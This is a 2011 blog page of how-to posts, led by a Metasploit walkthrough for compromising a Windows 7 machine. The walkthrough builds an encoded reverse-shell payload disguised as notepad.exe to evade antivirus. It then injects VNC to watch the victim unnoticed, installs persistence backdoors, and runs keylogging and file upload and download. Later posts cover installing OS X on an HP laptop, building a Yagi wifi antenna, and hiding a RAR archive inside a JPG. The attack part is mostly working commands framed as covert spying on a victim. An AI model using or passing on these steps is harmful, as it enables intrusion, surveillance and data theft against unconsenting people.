Tuesday 10 May 2011

How to Back|Track – Exploit Win7 (VNCinject)

GUIDE EXPLANATION:

Before Starting you need Backtrack get it here: http://9ea3912a.linkbucks.com

Text in {} = Titles

# In front of text = Info
Text in [] = Your Input

# Here are some examples on [] from the guide beneath:

# set LHOST [IP ADRESS INT.] = set LHOST 192.168.1.15

# rdesktop [IP]:[port] -u “[USERNAME]” = rdesktop 192.168.1.15:1337 -u “John”

# search -d “[DRIVE:\\FOLDER\\FOLDER]” -f *.jpg = search -d “C:\\windows\\New folder” -f *.jpg

# So when you input anything where there is [], remember to remove the []

First start Back|Track

{Shell 1} (Creating Exploit)

Open the konsole
cd /pentest/exploits/framework3
svn up
# To update the metasploit framework
clear

./msfpayload windows/meterpreter/reverse_tcp LHOST=[YOUR IP ADRESS INT./EXT.] LPORT=[YOUR PORT] R | \
./msfencode -e x86/shikata_ga_nai -c 5 -t raw | \
./msfencode -e x86/countdown -c 2 -t raw | \
./msfencode -e x86/shikata_ga_nai -c 5 -t raw | \
./msfencode -x notepad.exe -t exe -e x86/call4_dword_xor -c 2 -o /root/payload.exe

# If you get encoder error find another EXE or try to encode it less time

# Copy payload to target

# If you want to use this over the internet remember to use your external ip instead of using your internal IP and redirect the ports to your computer
=================================

{Shell 2} (Using Exploit)

cd /pentest/exploits/framework3/
clear
./msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST [IP ADRESS INT.]
set LPORT [PORT] (if used in msfpayload in Shell 1)
show options
exploit

# Once more you you gonna use this on the internet this time use your internal IP not the external one…

# Now we wait for connection, so start the payload on victim computer
=================================

DO NOT CLOSE the meterpreter connection/console we need it to upload the VNCinject…

 

{Shell3}[Preparing the VNCinject payload]

cd /pentest/exploits/framework3/
clear
./msfpayload windows/vncinject/reverse_tcp LHOST=[YOUR IP ADRESS INT./EXT.] LPORT=[YOUR PORT] R | \
./msfencode -e x86/shikata_ga_nai -c 5 -t raw | \
./msfencode -e x86/countdown -c 2 -t raw | \
./msfencode -e x86/shikata_ga_nai -c 5 -t raw | \
./msfencode -x notepad.exe -t exe -e x86/call4_dword_xor -c 2 -o /root/vncinject.exe

#I recommend to use a different port from the one used in shell1
==============================

 

{Shell4}[Using VNCinject]

In a different Metasploit Console (REMEMBER DO NOT CLOSE the one with the meterpreter connection)

use exploit/multi/handler
set PAYLOAD windows/vncinject/reverse_tcp
set LHOST [IP ADRESS INT.]
set LPORT [PORT] (if used in msfpayload in Shell 3)
show options
exploit


# Now in meterpreter console…
upload /root/vncinject.exe C:\\Users\\[username]\\Documents\\vncinject.exe

# In the local dir you must only use one “/” and on the remote you must use 2 “\”

#Now let’s execute the VNCinject.exe

In the meterpreter console…
execute -f c:\\Users\\[username]\\Documents\\vncinject.exe

Now you wait and it will show the remote desktop… the user don’t know that you are spying him… and you have the control of the computer… keyboard and mouse… and you can upload and download files through the meterpreter console
================================

 

{Setting up backdoors for future use} (when in meterpreter console)

run metsvc (set backdoor for next time you want in)
(OR THIS)
run persistence -r [YOUR IP ADRESS INT./EXT.] -p [YOUR PORT] -A -X -i 300
# 300 tells it to send request for connection every 300 sec. "run persistence -h" for more info
***UP- AND DOWNSIDES USING THIS***
METSVC:
VERY BAD: All 3 files is use gets flagged by Norton Internet Security 2011 as trojan, maybe other AV’s will do this too!
BAD: If ip change you have to know the IP to connect back to Victim
GOOD: Easy to use
GOOD: It dosn’t request YOUR IP and port!
PERSISTENCE:
BAD: It requests YOUR IP and port!
BAD: Can be more “difficult” to use
GOOD: Flexible
GOOD: Auto Connect
ALMOST GOOD: svchost.exe is reported as suspicious, but NOT as malware! It’s only when you run NPE (Norton Power Eraser) it is detected as bad, and will be removed. and that’s a tool you must download!
————————————-

 

{GET BACK INTO SYSTEM} (using metsvc in a new terminal)

cd /pentest/exploits/framework3/
svn up
clear
./msfconsole
use exploit/multi/handler
set PAYLOAD windows/metsvc_bind_tcp
set LPORT 31337 (Must be this port of what i know)
set RHOST [VICTIM IP ADRESS]
show options (see if your setup is correct)
exploit
————————————

 

{GET BACK INTO SYSTEM} (using persistence in a new terminal)

[code]cd /pentest/exploits/framework3/
svn up
clear
./msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST [IP ADRESS INT.]
set LPORT [PORT]
# The port set in persistence backdoor
show options
exploit
----------
# Now we wait for connection, it will reconnect to your computer within 300 sec
----------
getuid
# If = "NT AUTHORITY\SYSTEM" do this else go to "use priv":

ps
# Find PID on explorer.exe
steal_token [NUMBER - PID on explorer]
# From what i know it grants you the same rights as the user running that process
use priv
get system

 

Some useful commands for meterpreter

{Search} (in meterpreter console)
search -f *.jpg
# Finding all JPG files on the system


search -d "[DRIVE:\\FOLDER\\FOLDER]" -f *.jpg

# Finding all JPG filen i a specific folder
searct -f test.txt

# Find a specific file on the whole system

 

{Uploading and Downloading} (How I use it)

# Use "ls", "pwd" and "cd" to navigate around - see below under commands
Explanation:
Create a txt file on yout BT4 desktop and write any thing in it, or nothing, and save it with the name "test.txt" then in terminal in meterpreter console (after your connected to victim), navigate to the desktop of the user currently logged in.
Use "pwd" without quotes, to check if the path is correct, if it is type the following:

 

{Upload}

upload /root/test.txt test.txt
# and if you are uploading a file with space in it's name:
upload "/root/test 2.txt" "test 2.txt"

# Or if your not in the path where you want to upload a file, and want it to be uploaded to another folder

upload "/root/test 2.txt" "DRIVE:\\FOLDER\\FOLDER\\test 2.txt"
# Example: upload "/root/test 2.txt" "C:\\test\\test1\\test 2.txt"

 

{Download}

Explanation:
Now we are going to download the file we just uploaded the "test.txt". Navigate to the folder if your not already in it, by using the "cd", "pwd" and "ls" commands.
Then type:
download test.txt /root/test.txt

# And if you are downloading a file with space in it's name
download "test 2.txt" "/root/test 2.txt"

# Or if your not in the path where you want to download a file from, but know the exact path and name by using search
download "DRIVE:\\FOLDER\\FOLDER\\test 2.txt" "/root/test 2.txt"
# Example: download "C:\\test\\test1\\test 2.txt" "/root/test 2.txt"

 

{Commands} (meterpreter console)

help
# USE THIS!!! thats mostly how i got this knowledge and then googled the commands to get more info on them
screenshot
# No need to say what it does - remember you must have used "use priv" in meterpreter first
cd [DRIVE:\\FOLDER\\FOLDER]
# You get it - Change directory
pwd
# Show what directory your in
ls

# List Current Directory
upload

# See above
download

# See above
search

# See above and Meterpreter Search This can be used in diff. consoles!
keyscan_start

# Key Sniffer - Start
keyscan_dump

# Key Sniffer - dump keys while running
keyscan_stop

# Key Sniffer - Stop

Source: http://t.co/8QptJNZ

Monday 9 May 2011

How to install OSX 10.6.6 on Hp envy

HP envy 14

  • Install Method: Snow Leopard 10.6.6i
  • Processor: Intel i5 580-M
  • Hard Drive: 500GB- 7200 RPM
  • Memory: 4GB - 1 DIMM (DDR3)
  • Graphics: ATI RADEON 5650
Link to download 10.6.2 and 10.6.6i: http://324160bc.linkbucks.com
Make sure you check the md5 so the file isin't corrupted

Not working - wifi, webcam, and sleep (it crash, to unfreeze it press again on the power button), i also had trouble with usb (just try USBfix), Graphic Card :(

How i installed it:
  • 1- Boot leohazard 10.6.6i and partitionate your HDD in 2 (the size doesn't matter as far as it's over 10 GB and satisfy your ) input this to boot the DVD:
-cpus=1 busratio=20   (don't be surprised if it take time to boot 
usually can take up to 10min max)
  • 2- One for 10.6.6i and the other one for Windows*/Mac OSX 10.6.2 (10.6.2 will be use to remove kext that cause 10.6.6 not to boot)
  • 3- Once it's done your ready to install 10.6.6
  • PACKAGE to select for 10.6.6:
*Chameleon_Boot_Loader: chose RC5 or RC4 (i prefer RC5 but it's up to 
you i don't think that it really matter)
    *Kernel: CHECK IT, it's for legacy
    *Drivers
          *Graphics: NONE (exotic doesn't work)
          *Sound: VoodooHDA_0.2.7.2
          *Network:
          *Lan: NForceLan & RTL81XX
          *WLAN: none of them worked for me
    *Laptop: VoodooPS2Trackpad
    *Chipset: I selected AHCIPortinjector & ATAPortinjector & 
JMicronATA
    *Sata_Pata: AHCISATAFix
    *Patches: 
        -DSDT_Patcher
        -NTFS (if you wish to be able to read/write on NTFS)
        -UUID
        -USBFix (you might need it)
    *(X11 if you plan to use it)
  • 4- Now reboot and eject 10.6.6i hazard DVD and insert 10.6.2 hazard (boot on it) (in order  to work delete kext that mess up with graphics)
  • 5- Install 10.6.2 on the empty partition
  • 6- ONLY INSTALL this (do not select any Bootloader you already have one)
* 10.6.2 update combo
        * Kernel: Legacy_Kernel_10.2.0 (others didin't worked for me)
        * Graphic_Drivers: NONE 
        * Audio: voodooHDA and AppleHDA 
        * Network: I put BCM5787 (ethernet works)
        * Laptop_Support: INSTALL VOODOOPS2 (or you will be stuck 
to: do you wish to transfer data menu)
        * System_Support: 
               -CMOS_RESET_Fix: Apple RTC
               -SATA_ATA_Fix: AHCI_SATA_Fix
               -SMBIOS Resolver
               -Fakesmc_v1.0
P.N each single time you want to boot osx 10.6.2 you will have to put (cpus=1 busratio=20 ) anyway you only need 10.6.2 to edit 10.6.6i files (refer to 10.6.2 section for what works or not)
  • 7- Once everything is setup, boot into 10.6.2 and select(navigate into it) the partition where you installed 10.6.6
  • 8-navigate to System\Library\Extensions and delete this stuff:
-AppleIntelHD (there might be 4-5 backup them if your not sure)
     -ATI5000Controller.kext (or something like that) 
     -Pasting ATI5000Controller.kext (from lion as been report to work
  • 9-Reboot, and your good to GO
  • 10-Select 10.6.6i, partition, before hiting enter, input this:
cpus=1 busratio=20 PCIRootUID=1 GraphicsEnable=yes
  • 11-Now if you wish you can wipe 10.6.2 and replace it with windows, or wipe it and extend your 10.6.6 space there so many options
This one is really from me :) 
Source (osx86 wiki):  http://58119105.linkbucks.com

Friday 6 May 2011

How to build your own YAGI wifi Antenna

YAGI WI-FI ANTENNA DESIGN:

This is the antenna to build when you want results FAST and have just a few inexpensive tools and supplies available. It will extend your wi-fi range well beyond the limits of the dipoles that accompany most routers and some wireless adapters. When connected to a USB wireless adapter the performance is comparable to much more expensive equipment.

Sometimes the perfect antenna for a wi fi network is the one that can be made in an hour's time, is made of inexpensive parts, and yet enables connections over moderate to long distances. The yagi wi fi antenna design depicted here is exactly that! It is computer designed, made of wood and wire, and provides high gain and directivity. The 15 element wi fi antenna provides over 15 dB of gain, while the larger 20 element wi-fi antenna provides over 17 dB of gain. Front to back ratio for both antennas is about 22 dB.

Yagi antennas can be rather difficult to make - elements must be cut to the proper length, and spaced at the correct distance from other elements, or the antenna doesn't work. Before good computer tools were available, a designer used various charts and tables to determine antenna dimensions. These days, however, much of the mind numbing calculation can be carried out in a split second. One excellent tool for crunching design numbers is the W9CF yagi antenna modeler

Yagi wifi antenna dimensions
The 15 element yagi WiFi Antenna
dimensions in the W9CF java applet.
Yagi wifi antenna elements list
The antenna modeler also
lists element lengths and positions.


The on-line antenna modeler initially starts with several examples tailored for operation in the amateur radio bands. One of the best designs is the classic K1FO yagi. By following a few steps, the antenna can be scaled for 802.11 b/g/n frequencies:
  1. Start with the 15 or 20 element K1FO 70cm example.
  2. In the "units" menu, select "Radians."
  3. In the "conductivity" menu, select "Copper"
  4. In the "frequency" field, enter 2450 (MHz) for the center of the wi-fi networking band.
  5. For "Element Diameter", enter 0.08729 (radians).
  6. Click the "calculate" button.
  7. In the "units" menu, select "millimeters."
  8. Note that the element diameter perfectly matches 14 gauge wire!
  9. In the file menu, select "list elements."
The elements list will show each element, from the reflector (element 1, position zero mm), to the last director. Any changes in element diameter or design frequency will need recalculation and the new elements list checked. These dimensions work quite well:
Element data for the 15 Element Yagi Wi-Fi Antenna.
Element Length (mm) Position (mm)
1 (Reflector)59.610.00
2 (Driven Element)58.5518.34
3 (Director)55.2025.75
4 (Director)53.6239.51
5 (Director)52.3858.55
6 (Director)51.6882.19
7 (Director)50.97109.70
8 (Director)50.62140.74
9 (Director)50.26174.60
10 (Director)49.91210.94
11 (Director)49.56249.38
12 (Director)49.21289.60
13 (Director)48.85331.39
14 (Director)48.68374.25
15 (Director)48.50418.52
Element data for the 20 Element Yagi Wi-Fi Antenna.
Element Length (mm) Position (mm)
1 (Reflector)59.960.00
2 (Driven Element)58.9118.34
3 (Director)55.5625.75
4 (Director)53.9739.51
5 (Director)52.7358.55
6 (Director)52.0382.19
7 (Director)51.32109.70
8 (Director)50.97140.74
9 (Director)50.61174.60
10 (Director)50.26210.94
11 (Director)49.91249.38
12 (Director)49.56289.60
13 (Director)49.21331.39
14 (Director)49.03374.25
15 (Director)48.85418.52
16 (Director)48.68463.67
17 (Director)48.50509.70
18 (Director)48.32556.26
19 (Director)48.15603.53
20 (Director)47.97651.32
Below is a graphic adapted from the modeler which shows element lengths and positions along the boom, measured from the reflector (location zero millimeters). Note that the driven element is depicted in green, and for the wi-fi yagi project, will be a folded dipole. Why a folded dipole? It provides a good impedance match to coaxial cable when used as the yagi wi-fi antenna's driven element.
15 element Yagi wi fi antenna plan view
20 element Yagi wi fi antenna plan view 









This high gain wi-fi antenna can be constructed in a couple of hours and requires some measuring, cutting, bending, and bolting of metal. Use caution around the sharp edges. When finished, put it up and enjoy a very durable antenna that provides outstanding wi-fi performance.

YAGI WI-FI ANTENNA PARTS LIST:

  1. A 1.2 meter length of 14 AWG bare, solid copper wire.
  2. One wooden square, 1 cm per side, 50 cm long (70 cm for the 20 element antenna).
  3. Wire cutters.
  4. Metric ruler.
  5. Drill, with 1.6 mm (1/16") bit.
  6. Printed or written template with antenna dimensions.
  7. Ball point pen or fine felt tipped marker.

YAGI WI-FI ANTENNA CONSTRUCTION:

Building the yagi wi-fi antenna will now continue, with preparation of the boom, followed by element mounting. After the elements are mounted, a suitable connector is added, and the antenna is tested over-the-air.
  1. Draw a line as accurately as possible down the center of one side of the wooden boom.
  2. Mark the boom centerline 5 cm from one end. This is the "zero location," where the director element will be mounted.
  3. Continue down the boom, carefully marking the locations of each element on the centerline.
  4. Carefully drill through the boom at each element's location. Make sure to drill straight through the boom, emerging on the other side still centered and perpendicular.
  5. Cut one element at a time, carefully measuring each element before and after cutting, trimming as necessary for proper length. File the wire ends and make sure the lengths are as accurate as possible!
  6. Press elements through the boom, centering each before moving to the next element.
Yagi Wi-Fi antenna element positions
Element positions marked
on the yagi wi-fi antenna boom.
Yagi Wi-Fi antenna reflector mounted
The reflector element
after mounting.
  1. For the driven element, cut a 130 mm length of wire, and make a 180 degree bend 30 mm from one end. Mount in boom, then make a bend 30 mm from other end. Adjust as necessary to create a folded dipole just under 59 mm in length with 5 mm spacing.
  2. Double check all elements, making sure all are centered and parallel.
  3. Attach a pigtail (or connector) to open ends of folded dipole.
Yagi Wi-Fi antenna driven element
Folded dipole prior
to mounting in antenna boom.
Yagi Wi-Fi antenna driven element  mounted
The driven element
before the last bend.
Two yagi wifi antenna elements mounted
Two yagi wi-fi antenna
elements mounted in boom.
After all of the elements are measured, cut, and mounted, the antenna should resemble the finished yagi pictured below. Connect the pigtail or connector to the driven element. Then connect the wi-fi device to the antenna and start checking over-the-air signal strengths. Note that the antenna may be sensitive to polarization: when the antenna seems to bring in the best signal, rotate it to find the best polarization. Mounting the antenna is possible using commonly available hardware, such as 90 degree angle brackets, U bolts, or even velcro.

Yagi Wifi Antenna Feedpoint
Closeup of the wi-fi yagi feedpoint.
Keep the leads short!
Yagi Wifi Antenna Finished
The completed wi-fi yagi antenna.

YAGI WI-FI ANTENNA TESTING:

For the most practical method of signal checking, consider using a wi-fi auditing utility such as Kismet, Airodump (look for Backtrack 4 linux distro used for pentesting), or Netstumbler. Any of these will produce a rapidly updated received signal strength indication that is useful for comparing or aiming wi-fi directional antennas. Make a set of measurements for any desired wi-fi access points on the original antenna, then make a new set for the yagi wi-fi antenna.
The antenna should exhibit high forward gain and front-to-back ratio. A prototype in fact performed as well as the wi-fi 12 turn helical antenna shown elsewhere in these pages. Indeed, the antenna exhibits near the theoretical 15 db gain, enabled broadband connections at 54 MB/S over a path that at best reached 11 MB/S on an unmodified wi-fi adapter. Again, for ultimate performance over long distance wi-fi links, use a short version of the yagi to feed a parabolic reflector.
Good luck building the yagi wifi antenna, and may you enjoy solid long range connections!

Thursday 5 May 2011

How to hide files in JPG images

Hi… I’m gonna teach you how to hide files in jpg images… it’s very easy!

You must have winrar installed in your computer!
Download it here: http://bdeda0a9.linkbucks.com
Or just google it :)

Steps to Hide any File behind JPEG image Manually

1. Create an folder into C drive (recommendation is that use this C:\Hidden).

2. Now gather all files that you want to hide in this folder.

3. Now add these all files to compressed .rar file using winrar
(example myhiddenfiles.rar ).
Note: This rar file should be in the same directory (i.e. C:\Hidden)

4. Now Select the JPEG file that you want to use to hide the above content
(say myimage.jpg). Put this image file also in the same folder that is in C:\Hidden

5. Now, open Command Prompt (Go to Run and type ‘cmd‘). Make your working directory C:\hidden.
(When you open CMD you will get like C:\Documents and settings\username (something like this)
Now type cd.. and press enter and then again type cd.. and press enter. Now you have something like this in cmd C:\ . Now in front of that type cd “Hidden” and press enter. )

6. Now type: “COPY /b myimage.jpg + myhiddenfiles.rar outputimage.jpg” (without quotes) – Now, myimage.jpg is the picture you want to show, myhiddenfiles.rar is the file to be hidden, and outputimage.jpg is the file which contains both….

7. Now, after you have done this, you will see a file output.jpg in C:\hidden. Open it (double-click) and it will show the picture you wanted to show. Now try opening the same file with WinRAR, it will show the hidden archive…

Source: http://t.co/PlcIROU